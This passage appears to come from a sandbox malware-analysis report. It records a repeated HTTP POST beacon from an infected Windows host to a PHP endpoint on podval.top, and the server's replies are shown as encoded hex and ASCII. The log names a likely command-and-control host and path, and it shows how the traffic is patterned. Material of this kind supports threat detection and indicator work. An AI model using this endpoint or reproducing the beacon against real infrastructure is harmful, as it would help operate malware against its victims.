                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oY48L38sjQb8fdZxLygJYr%2BwjsXncG3Mkr0eKhRI1y1q3VTzubxIG2fWRT3mXgeAIvShj2IeTsrfKmV5%2BnbwSaADGN%2FwOWvHhqH1G1kgY9RDy%2FENtbW5THtc6%2BY9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a64d8aef42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 17 25 3a 0c 02 24 22 24 0a 39 3d 20 08 3f 5b 3c 16 2f 17 36 06 3f 1a 29 10 2e 00 36 50 23 03 2d 06 2b 2c 28 1b 26 20 30 1c 22 1b 20 5b 04 1c 20 05 3f 2a 21 5e 3c 38 2f 1c 25 02 03 0b 24 09 22 05 30 38 32 56 24 06 37 5c 3d 3b 39 55 33 32 2b 5a 2b 3b 32 11 2a 37 39 02 21 34 21 54 02 13 22 57 27 2e 3d 1e 37 1e 2f 52 25 09 29 1b 24 34 05 1b 33 1d 00 10 2a 0d 21 0a 26 31 33 00 36 2c 27 52 30 3b 25 02 26 2d 3d 5a 21 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%:$"$9= ?[</6?).6P#-+,(& 0" [ ?*!^<8/%$"082V$7\=;9U32+Z+;2*79!4!T"W'.=7/R%)$43*!&136,'R0;%&-=Z!8#_+)V3YT0
                                                    Jul 3, 2024 16:43:46.356400967 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:46.455179930 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:46.753828049 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tp56h%2BJMHjFlAVWXgURs6nx9A4CR%2BMeYj6puNi8gio4NRR%2F3M%2BArIJ%2BoX0vYyWtyNioQ2L%2B8TxvVckljzKUaA1Nkg1FdEdzL5VYHYmO8ZPk0pMoN3b6OOwuaooq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6570c1242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5d 27 3a 08 03 25 0c 0d 16 2c 2d 27 1a 3f 03 23 00 38 3a 35 16 28 1d 21 5b 2d 3e 2e 50 34 04 04 5c 28 2c 2f 01 32 09 2c 50 35 31 20 5b 04 1c 23 1f 3c 5c 21 5f 29 3b 38 0e 26 3c 21 40 24 19 17 5d 33 28 3d 0d 27 38 20 01 3d 28 3d 51 24 22 0d 11 2a 28 3d 06 2b 37 00 59 36 34 21 54 02 13 22 1d 27 2d 1b 57 34 0e 0d 57 26 1e 13 14 27 37 28 08 33 33 26 54 28 20 25 0d 27 21 2b 02 23 2c 3b 56 26 38 2d 07 26 2d 39 58 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%]':%,-'?#8:5(![->.P4\(,/2,P51 [#<\!_);8&<!@$]3(='8 =(=Q$"*(=+7Y64!T"'-W4W&'7(33&T( %'!+#,;V&8-&-9X!(#_+)V3YT0
                                                    Jul 3, 2024 16:43:47.761028051 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:47.859983921 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:48.210644007 CEST743INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1oiVuhxgZjSmS2wf%2FIYEIv%2Bdo2szRHrtN%2BEJ5RjBG195%2FiqGhXm7G6haz3E49FjMlUF1%2BP%2BQvqAK7mpi%2Fhluh4lhVx%2FQJsY4ieGwKJ3Ojb%2Bc3zahvx%2F0gOm1HkC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65fdd1842fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 25 3a 3d 13 24 22 23 52 3a 03 24 0f 3c 3e 20 59 2f 00 29 5c 2b 0a 3a 04 2d 58 32 53 37 04 32 5b 2b 02 38 5c 32 33 24 55 22 1b 20 5b 04 1c 20 03 2b 2a 2d 5f 2b 38 23 1c 24 2c 03 41 33 19 1b 58 33 02 26 55 24 16 37 5a 3d 2b 39 54 24 1c 23 59 2a 5e 39 00 2b 09 08 5b 36 1e 21 54 02 13 21 08 24 03 29 52 20 20 27 11 26 56 3d 5c 33 37 2f 51 33 33 3e 56 3e 30 22 57 24 57 20 58 22 01 3f 56 33 38 3d 04 30 13 04 05 36 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&%:=$"#R:$<> Y/)\+:-X2S72[+8\23$U" [ +*-_+8#$,A3X3&U$7Z=+9T$#Y*^9+[6!T!$)R '&V=\37/Q33>V>0"W$W X"?V38=06#_+)V3YT0
                                                    Jul 3, 2024 16:43:49.214082956 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:49.313589096 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:49.648189068 CEST728INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiaB%2BXYfEGNzshbiHWYN52P7Gd2qHjpRwN2V88t85%2Fr%2BXUhhLcu9Z15SIn2RSpc4bhIJMD064c21K829RYJBpD8NOied2CAI44g4AlOL5WM%2BRwtHWXR3ON1%2FzfBb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a668ee9742fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 31 39 36 02 25 22 23 50 2c 3d 3b 14 2b 03 01 01 38 3a 2a 07 2b 27 36 00 3a 3d 21 0d 37 29 2e 5d 3f 02 33 05 26 09 23 0c 35 31 20 5b 04 1c 23 5a 3f 04 21 1d 29 38 37 55 26 05 3d 43 33 0e 21 11 27 28 3a 11 30 01 28 03 28 3b 36 0f 24 1c 01 58 29 06 3a 13 3c 09 04 58 21 24 21 54 02 13 21 0f 30 3d 21 57 23 30 28 0d 31 09 35 58 33 34 27 50 25 20 2d 0d 3e 1d 39 0c 24 22 27 03 35 3f 2b 1e 27 06 3d 02 24 3d 00 04 22 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98&196%"#P,=;+8:*+'6:=!7).]?3&#51 [#Z?!)87U&=C3!'(:0((;6$X):<X!$!T!0=!W#0(15X34'P% ->9$"'5?+'=$="(#_+)V3YT
                                                    Jul 3, 2024 16:43:50.794486046 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:50.894210100 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:51.202677965 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E35PYclZ303RJEFljSFlCz%2BiSvFQ59ens%2FW4DuZgHXnfdJLDk1bF%2BQWJl06v5Lxfbb5Unpa2GaE9I9cs9fRBlPOUaCDag6jy3VkgB9WKjX4aWUKf1Cs6Io11t1n3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a672c9ba42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 59 27 2a 3d 59 24 32 01 16 2e 13 30 09 2b 04 3f 04 2f 17 21 14 28 37 36 05 2d 3d 29 0b 23 29 2e 5f 2b 12 30 1b 25 56 2f 0d 21 31 20 5b 04 1c 23 10 3c 3a 07 1d 3f 3b 27 1e 26 3f 35 43 33 0e 35 5d 24 5d 2d 0b 25 28 0d 12 2b 01 3d 1c 33 0b 20 00 3e 28 0c 12 3f 27 36 5e 20 34 21 54 02 13 22 57 27 3d 3a 0a 37 30 23 1f 32 20 36 06 30 1a 30 0c 33 0d 2e 1e 3d 0d 2d 0a 30 1f 3c 13 22 06 37 1f 24 38 25 02 26 2d 2d 5a 35 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%Y'*=Y$2.0+?/!(76-=)#)._+0%V/!1 [#<:?;'&?5C35]$]-%(+=3 >(?'6^ 4!T"W'=:70#2 6003.=-0<"7$8%&--Z5#_+)V3YT0
                                                    Jul 3, 2024 16:43:52.216429949 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:52.314860106 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:52.647317886 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xN7B4Ki73wH3QI0y%2FyMI8BVoQPB2Qvc94re3W%2FTgdDQ7lxCp7ZunTcU%2F9YTdctPeRKXtYKWmuQvEYxjJac%2Fj5onYyVdSaPLpfRdjAeW6BQQ4jeHrKYYmCoQX%2BKKj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a67bacc242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 59 25 39 2d 5c 32 32 05 50 2d 2d 23 52 28 03 0e 5e 2c 17 29 5f 3c 1d 29 5a 39 07 2a 55 20 2a 04 15 2b 05 37 00 26 30 0e 55 21 0b 20 5b 04 1c 23 1f 2b 2a 29 58 3f 06 0e 0f 26 2c 07 42 30 27 29 59 24 2b 25 0f 24 2b 23 10 3c 5e 3d 54 30 0c 3f 10 29 3b 25 06 28 19 0b 07 20 34 21 54 02 13 22 1f 24 3d 35 11 37 1e 0d 1f 32 0e 25 5c 24 1d 2f 16 27 33 25 0b 2a 33 25 0a 24 31 30 5b 35 06 3b 56 30 16 3d 04 24 3d 39 5a 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%Y%9-\22P--#R(^,)_<)Z9*U *+7&0U! [#+*)X?&,B0')Y$+%$+#<^=T0?);%( 4!T"$=572%\$/'3%*3%$10[5;V0=$=9Z#(#_+)V3YT0
                                                    Jul 3, 2024 16:43:53.651774883 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:53.750480890 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:54.088128090 CEST737INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xf36Hxq35kO%2BgXGQcLWjKJUWbAS%2BEmYkd%2F6Htax9s9BVPV%2F924i95mGGN%2BDh2%2FfnSaYMFQ7N8CC%2BEeL66A3vyNmLJWh6h7fpg1Mr1EaZYPpRv3Ar6hYi9BcHRxWb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a684ae7242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 07 25 3a 2e 05 25 1c 34 0a 2d 3e 33 57 3c 2e 20 59 2d 29 2e 04 3f 1a 36 02 2d 07 36 54 20 5c 3e 5c 3f 2f 30 59 31 33 30 56 22 1b 20 5b 04 1c 23 10 3c 04 26 03 28 38 2c 0d 32 05 29 08 30 37 35 10 30 15 29 0a 33 3b 3f 1f 3f 16 3e 0e 27 0b 2f 5d 2a 01 26 11 2a 37 2e 5b 22 24 21 54 02 13 21 0d 27 2d 13 56 23 0e 2b 1f 25 30 21 5c 26 24 24 0d 27 33 26 52 28 20 26 52 27 22 24 10 22 59 28 0f 27 28 2a 5a 27 2d 26 03 35 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&%:.%4->3W<. Y-).?6-6T \>\?/0Y130V" [#<&(8,2)0750)3;??>'/]*&*7.["$!T!'-V#+%0!\&$$'3&R( &R'"$"Y('(*Z'-&5#_+)V3YT0
                                                    Jul 3, 2024 16:43:55.104429007 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:55.202750921 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:55.541383028 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vf4hz3C2FIXf8MP6ZPmRIaaZ02kKtVEpIQ%2Bo0zEEPGY8Tf4pg0D6VLgmxNrxvoHz3SOemjIvAa9BWoAZ9SKRwwsudgJEhCavcTRtwG3cLw7vxG1jd68GFTaPzjsq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68db8ba42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 26 04 29 5c 25 32 01 55 2c 2d 23 57 2b 2d 2f 00 2f 3a 29 19 3c 24 35 5a 3a 3e 03 08 34 3a 35 03 28 3c 2b 01 24 20 28 1d 35 1b 20 5b 04 1c 23 58 2b 04 25 58 2b 01 30 0a 24 2c 25 0b 27 24 3e 01 26 38 39 0f 33 3b 3c 03 3c 16 39 54 30 0b 2c 03 2a 01 3a 59 3f 27 2a 5f 20 34 21 54 02 13 22 1f 24 13 1b 54 34 30 2b 57 31 1e 21 16 27 27 27 18 33 33 0c 57 29 0a 26 56 26 21 20 5d 36 01 09 1d 30 38 22 18 30 13 22 04 36 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&)\%2U,-#W+-//:)<$5Z:>4:5(<+$ (5 [#X+%X+0$,%'$>&893;<<9T0,*:Y?'*_ 4!T"$T40+W1!'''33W)&V&! ]608"0"6#_+)V3YT0
                                                    Jul 3, 2024 16:43:56.558155060 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:56.683948040 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.043239117 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJRsYFxMpfQ0DbHYXrtXKXkFN5m7MBCQG%2FONsAFm%2FK3VMug14PCQnIGAGrDL8%2Bs2Z20KCRiRauMhK5cQJYVH%2B%2B7MZZbBawcnzuXTJwuMQjP16KbOCp57k6EaBRSz"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a696ea6b42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 31 03 22 02 32 0c 3f 18 2e 13 33 57 29 3d 0a 5f 2f 07 04 07 2b 42 29 13 2e 00 36 55 23 14 21 02 3f 2f 3b 06 26 09 30 1e 22 1b 20 5b 04 1c 23 10 3e 3a 2d 12 3c 01 37 55 26 2c 35 05 30 0e 3e 04 24 05 21 0d 30 28 05 12 28 3b 36 09 33 21 23 58 3e 2b 26 5b 3c 51 35 01 36 34 21 54 02 13 21 0c 30 2e 39 1c 20 33 3c 0a 31 1e 25 1b 27 42 3b 50 30 23 0c 56 2a 1d 26 53 27 08 24 5c 22 06 2b 53 33 38 3a 17 33 03 0b 5b 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%1"2?.3W)=_/+B).6U#!?/;&0" [#>:-<7U&,50>$!0((;63!#X>+&[<Q564!T!0.9 3<1%'B;P0#V*&S'$\"+S38:3[!(#_+)V3YT0
                                                    Jul 3, 2024 16:43:58.068661928 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.166929007 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:58.469916105 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pt1jzbHBAZk8bJrc1HT4EIXdyWQlhfzOczjI%2BNuQm70GDFb1d4F2S1Gdk9q4D3lgS4j0nn01xAVw2xqYi3j6wXCLWSKAa9Wgbr7CuW0zwYzC9sgtPCTGlxEBuH7H"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a03cb142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 32 3a 25 5d 25 0b 30 08 39 2e 33 57 28 13 23 00 2c 17 04 02 28 24 3d 13 2e 2d 21 0d 22 39 29 04 2a 2f 38 59 26 56 38 1c 35 1b 20 5b 04 1c 20 00 28 3a 2d 1d 3f 06 23 53 26 05 2d 40 30 27 14 02 30 3b 08 54 24 5e 3f 11 3f 28 3d 51 24 32 3c 03 3e 2b 31 03 3c 34 2e 5b 22 1e 21 54 02 13 21 0f 27 04 25 54 23 23 38 0c 32 0e 18 05 33 34 0a 09 24 1d 22 10 3e 0a 26 10 24 0f 34 11 22 11 3b 1d 27 06 2e 5a 33 03 25 5c 21 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%2:%]%09.3W(#,($=.-!"9)*/8Y&V85 [ (:-?#S&-@0'0;T$^??(=Q$2<>+1<4.["!T!'%T##8234$">&$4";'.Z3%\!#_+)V3YT0
                                                    Jul 3, 2024 16:43:59.480606079 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:59.580305099 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:59.916098118 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zwSqpcQglI%2B1abanwefIOvvzxQnmXv2RCRxLS%2Bo4jZNeNo6zhF5ECIAhw40%2FpRsnge7KBJnaqZc1YI6Fw%2FfJjBNoSd1uwaHSVYYvqeJN1ym82QNIpkA2feD0QH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a91f5442fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5f 31 04 25 5d 25 0b 3f 51 3a 3e 24 09 2b 13 38 5d 2d 39 39 17 3c 1a 36 00 2e 3e 3d 0a 23 2a 2d 07 3c 05 2f 04 25 1e 27 0d 22 21 20 5b 04 1c 23 5a 3f 29 21 59 29 28 27 1c 32 05 2e 1e 24 09 36 02 27 38 32 1f 24 28 23 11 3f 5e 25 13 26 21 3f 5a 3e 28 3d 00 28 19 3a 5f 20 24 21 54 02 13 21 0e 27 3e 35 1c 34 33 3c 0c 31 56 3d 58 24 42 38 0a 27 55 36 1e 28 20 3a 10 27 21 19 03 35 11 0d 52 24 38 2e 16 30 3d 39 5b 35 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%_1%]%?Q:>$+8]-99<6.>=#*-</%'"! [#Z?)!Y)('2.$6'82$(#?^%&!?Z>(=(:_ $!T!'>543<1V=X$B8'U6( :'!5R$8.0=9[58#_+)V3YT0
                                                    Jul 3, 2024 16:44:00.933501959 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:01.167434931 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:01.556741953 CEST736INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YumhUAuijX%2FqH1iLvbPeWSjuTVAKap%2BKwuKaXZDRI1BNKDtAgqg%2FcwykprGBt2d08nV%2Fw3bzCGbhzT%2Fi%2B2hCrhJm3MYu9bT8XBqq3ol%2BGtth%2FWv3ifAWS%2FSaaq35"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b28a8042fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5e 26 14 31 5c 25 32 34 09 2e 13 3b 1b 28 04 24 1b 38 39 0b 17 3c 42 39 5d 2d 58 22 16 34 5c 32 5b 2b 3c 24 16 32 1e 0a 1d 35 1b 20 5b 04 1c 23 5c 28 3a 07 5b 3f 16 23 54 26 3f 31 41 25 37 14 00 30 38 26 53 33 06 20 04 3d 28 3d 57 24 22 2c 03 2a 01 3a 11 2b 24 36 5e 22 1e 21 54 02 13 22 55 25 3e 36 0a 20 1e 28 0b 25 0e 2a 00 26 34 0a 08 27 33 21 0b 2a 30 2a 57 27 1f 34 5b 21 11 05 53 27 2b 22 5c 26 3d 0b 12 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%^&1\%24.;($89<B9]-X"4\2[+<$25 [#\(:[?#T&?1A%708&S3 =(=W$",*:+$6^"!T"U%>6 (%*&4'3!*0*W'4[!S'+"\&=!(#_+)V3YT
                                                    Jul 3, 2024 16:44:02.700428963 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:02.798968077 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:03.267462969 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdxVu10eh6nhQo5xkMe6wtss2niIsmqIzODVAmWrmUOuuly7szNDG%2Bxh4hVO%2Bi5lj3Tv0R8uD83%2FDe0%2BjJmku3%2ByC7Yb%2FzoCjMAc2Mfc4wR0IGvMfUpaplODgkeZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6bd3e0d42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
